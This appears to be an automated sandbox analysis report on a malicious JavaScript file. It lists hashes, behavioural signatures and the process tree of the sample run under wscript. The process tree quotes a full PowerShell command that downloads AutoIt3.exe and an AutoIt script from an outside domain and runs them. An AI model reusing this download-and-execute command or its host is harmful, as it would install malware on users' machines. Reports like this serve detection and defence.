Analysis
-
max time kernel
121s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
07-11-2023 16:23
Static task
static1
Behavioral task
behavioral1
Sample
5f475d11b0914f11.js
Resource
win7-20231023-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
5f475d11b0914f11.js
Resource
win10v2004-20231023-en
10 signatures
150 seconds
General
-
Target
5f475d11b0914f11.js
-
Size
254KB
-
MD5
40e1292e9b1fe1a88b32b99e3ca9f72f
-
SHA1
5a0403673919d994412f4635998e8f8a3ac315a8
-
SHA256
00f25f4e27938650e42747fc5b85d87e040d8c79db82c72ccf05ca03c8d32771
-
SHA512
3ed3109bd47fe056f01a5c6cb912addf2a90e9e55e1c412d3641d42335f80058594e2294b5c4cb6fd6d728add7a03115807595c87a4ff32149e93624dbad8e67
-
SSDEEP
6144:Ne7hgXeerjqlI2Iro+qg3e7hgXeerjqlI2Iro+8:NIhgSlI23tKIhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2604 powershell.exe 2604 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2604 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2956 wrote to memory of 2604 2956 wscript.exe 28 PID 2956 wrote to memory of 2604 2956 wscript.exe 28 PID 2956 wrote to memory of 2604 2956 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\5f475d11b0914f11.js1⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351/msiasfgadcz' -OutFile 'asfgadcz.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'asfgadcz.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-